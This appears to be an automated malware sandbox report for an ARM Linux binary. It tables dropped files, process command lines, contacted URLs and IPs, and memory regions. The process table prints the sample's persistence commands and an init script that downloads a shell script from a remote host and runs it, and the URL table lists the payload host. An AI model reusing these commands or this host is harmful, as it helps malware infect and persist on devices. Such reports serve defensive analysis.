Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm.nn-20241122-0008.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm.nn-20241122-0008.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.KbX88j (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/rm
|
rm -f /tmp/tmp.b45DMQaVoJ /tmp/tmp.f4z93NFFaP /tmp/tmp.FZB2aCKCCV
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/rm
|
rm -f /tmp/tmp.b45DMQaVoJ /tmp/tmp.f4z93NFFaP /tmp/tmp.FZB2aCKCCV
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
/tmp/arm.nn-20241122-0008.elf
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn-20241122-0008.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn-20241122-0008.elf'\n
/tmp/arm.nn-20241122-0008.elf &\n wget eqqm7,,.60+.10+.+4-, -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n
;;\n stop)\n echo 'Stopping arm.nn-20241122-0008.elf'\n killall arm.nn-20241122-0008.elf\n ;;\n restart)\n $0
stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn-20241122-0008.elf"
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm.nn-20241122-0008.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm.nn-20241122-0008.elf
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm.nn-20241122-0008.elf /etc/rc.d/S99arm.nn-20241122-0008.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm.nn-20241122-0008.elf /etc/rc.d/S99arm.nn-20241122-0008.elf
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm.nn-20241122-0008.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 45 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
88.127.32.250
|
unknown
|
France
|
||
|
135.165.144.124
|
unknown
|
United States
|
||
|
113.230.110.159
|
unknown
|
China
|
||
|
173.128.210.56
|
unknown
|
United States
|
||
|
175.40.208.216
|
unknown
|
India
|
||
|
140.169.55.41
|
unknown
|
United States
|
||
|
133.107.138.172
|
unknown
|
Japan
|
||
|
165.200.179.212
|
unknown
|
United States
|
||
|
201.42.84.160
|
unknown
|
Brazil
|
||
|
40.118.160.209
|
unknown
|
United States
|
||
|
45.97.235.94
|
unknown
|
Egypt
|
||
|
132.232.8.120
|
unknown
|
China
|
||
|
129.15.181.43
|
unknown
|
United States
|
||
|
44.153.140.222
|
unknown
|
United States
|
||
|
123.2.137.237
|
unknown
|
Australia
|
||
|
189.76.60.215
|
unknown
|
Brazil
|
||
|
167.118.127.130
|
unknown
|
United States
|
||
|
152.81.170.145
|
unknown
|
France
|
||
|
12.133.122.213
|
unknown
|
United States
|
||
|
216.206.238.42
|
unknown
|
United States
|
||
|
60.141.253.23
|
unknown
|
Japan
|
||
|
149.173.46.232
|
unknown
|
United States
|
||
|
18.208.63.213
|
unknown
|
United States
|
||
|
174.252.129.176
|
unknown
|
United States
|
||
|
177.80.180.103
|
unknown
|
Brazil
|
||
|
82.203.7.2
|
unknown
|
United Kingdom
|
||
|
39.115.62.80
|
unknown
|
Korea Republic of
|
||
|
2.131.4.134
|
unknown
|
Denmark
|
||
|
1.53.237.225
|
unknown
|
Viet Nam
|
||
|
63.121.207.50
|
unknown
|
United States
|
||
|
199.198.82.112
|
unknown
|
Canada
|
||
|
73.103.69.46
|
unknown
|
United States
|
||
|
104.28.200.40
|
unknown
|
United States
|
||
|
28.205.124.152
|
unknown
|
United States
|
||
|
196.55.25.165
|
unknown
|
South Africa
|
||
|
186.231.183.155
|
unknown
|
Brazil
|
||
|
199.26.136.51
|
unknown
|
United States
|
||
|
61.13.96.211
|
unknown
|
Singapore
|
||
|
46.252.175.58
|
unknown
|
Russian Federation
|
||
|
150.5.55.101
|
unknown
|
Japan
|
||
|
108.83.154.195
|
unknown
|
United States
|
||
|
205.164.148.250
|
unknown
|
United States
|
||
|
22.111.186.203
|
unknown
|
United States
|
||
|
114.145.143.13
|
unknown
|
Japan
|
||
|
135.27.194.50
|
unknown
|
United States
|
||
|
197.101.246.238
|
unknown
|
South Africa
|
||
|
200.106.40.166
|
unknown
|
Peru
|
||
|
75.240.157.97
|
unknown
|
United States
|
||
|
125.154.107.87
|
unknown
|
Korea Republic of
|
||
|
41.12.126.92
|
unknown
|
South Africa
|
||
|
41.152.54.27
|
unknown
|
Egypt
|
||
|
169.225.29.24
|
unknown
|
United States
|
||
|
23.68.121.155
|
unknown
|
United States
|
||
|
88.245.245.73
|
unknown
|
Turkey
|
||
|
156.125.199.236
|
unknown
|
United States
|
||
|
131.90.84.208
|
unknown
|
United States
|
||
|
147.200.45.245
|
unknown
|
Australia
|
||
|
50.96.249.163
|
unknown
|
United States
|
||
|
134.60.233.62
|
unknown
|
Germany
|
||
|
194.163.249.204
|
unknown
|
Germany
|
||
|
180.118.238.202
|
unknown
|
China
|
||
|
97.130.166.242
|
unknown
|
United States
|
||
|
175.154.149.220
|
unknown
|
China
|
||
|
221.5.169.215
|
unknown
|
China
|
||
|
38.120.151.204
|
unknown
|
United States
|
||
|
163.3.148.238
|
unknown
|
Sweden
|
||
|
17.244.182.98
|
unknown
|
United States
|
||
|
156.100.223.33
|
unknown
|
United States
|
||
|
17.128.62.103
|
unknown
|
United States
|
||
|
220.85.241.39
|
unknown
|
Korea Republic of
|
||
|
67.136.233.160
|
unknown
|
United States
|
||
|
189.180.237.10
|
unknown
|
Mexico
|
||
|
216.206.154.252
|
unknown
|
United States
|
||
|
7.196.112.193
|
unknown
|
United States
|
||
|
31.58.63.253
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
203.24.21.168
|
unknown
|
Australia
|
||
|
43.231.191.207
|
unknown
|
Japan
|
||
|
83.248.36.237
|
unknown
|
Sweden
|
||
|
180.108.200.174
|
unknown
|
China
|
||
|
26.123.233.205
|
unknown
|
United States
|
||
|
217.16.29.179
|
unknown
|
Russian Federation
|
||
|
139.169.190.197
|
unknown
|
United States
|
||
|
61.4.179.120
|
unknown
|
China
|
||
|
22.120.92.122
|
unknown
|
United States
|
||
|
32.187.22.75
|
unknown
|
United States
|
||
|
220.149.123.225
|
unknown
|
Korea Republic of
|
||
|
136.246.184.94
|
unknown
|
United States
|
||
|
61.156.158.38
|
unknown
|
China
|
||
|
204.212.61.133
|
unknown
|
United States
|
||
|
168.239.91.246
|
unknown
|
United States
|
||
|
143.123.133.128
|
unknown
|
United States
|
||
|
60.147.183.201
|
unknown
|
Japan
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
71.172.242.121
|
unknown
|
United States
|
||
|
129.252.44.196
|
unknown
|
United States
|
||
|
128.223.147.221
|
unknown
|
United States
|
||
|
102.68.31.175
|
unknown
|
South Africa
|
||
|
77.108.138.78
|
unknown
|
United Kingdom
|
||
|
56.107.160.239
|
unknown
|
United States
|
||
|
23.139.170.150
|
unknown
|
Reserved
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f66cc032000
|
page execute read
|
|
||
|
7f66cc032000
|
page execute read
|
|
||
|
7f67d3dbd000
|
page read and write
|
|||
|
7f67d46fb000
|
page read and write
|
|||
|
7f67cbfff000
|
page read and write
|
|||
|
7f67d3523000
|
page read and write
|
|||
|
5571a8d95000
|
page read and write
|
|||
|
5571aad93000
|
page execute and read and write
|
|||
|
7f67d3d2b000
|
page read and write
|
|||
|
5571a8d8c000
|
page read and write
|
|||
|
5571a8b3b000
|
page execute read
|
|||
|
7f67d4a05000
|
page read and write
|
|||
|
7f67d4a05000
|
page read and write
|
|||
|
7f67d411f000
|
page read and write
|
|||
|
7f67cc021000
|
page read and write
|
|||
|
5571a8d8c000
|
page read and write
|
|||
|
7f67d4a29000
|
page read and write
|
|||
|
7ffca8863000
|
page read and write
|
|||
|
7f67d438a000
|
page read and write
|
|||
|
7f67d4a6e000
|
page read and write
|
|||
|
7f67d3dbd000
|
page read and write
|
|||
|
7f67d43ad000
|
page read and write
|
|||
|
7f67d3d2b000
|
page read and write
|
|||
|
5571ac8cb000
|
page read and write
|
|||
|
5571aadaa000
|
page read and write
|
|||
|
7f67cc021000
|
page read and write
|
|||
|
5571a8b3b000
|
page execute read
|
|||
|
7f67d411f000
|
page read and write
|
|||
|
7f66cc03f000
|
page read and write
|
|||
|
7ffca89ef000
|
page execute read
|
|||
|
7f66cc044000
|
page read and write
|
|||
|
7f66cc03b000
|
page read and write
|
|||
|
7f67d438a000
|
page read and write
|
|||
|
7f67d4519000
|
page read and write
|
|||
|
5571aad93000
|
page execute and read and write
|
|||
|
7f67d4a6e000
|
page read and write
|
|||
|
7ffca8863000
|
page read and write
|
|||
|
7f66cc03f000
|
page read and write
|
|||
|
5571ac8cb000
|
page read and write
|
|||
|
7f67d43ad000
|
page read and write
|
|||
|
7f67d48dc000
|
page read and write
|
|||
|
5571a8d95000
|
page read and write
|
|||
|
7f67d4519000
|
page read and write
|
|||
|
7ffca89ef000
|
page execute read
|
|||
|
7f66cc03b000
|
page read and write
|
|||
|
5571aadaa000
|
page read and write
|
|||
|
7f67d46fb000
|
page read and write
|
|||
|
7f67cbfff000
|
page read and write
|
|||
|
7f67d48dc000
|
page read and write
|
|||
|
7f67d4a29000
|
page read and write
|
|||
|
7f67d3523000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.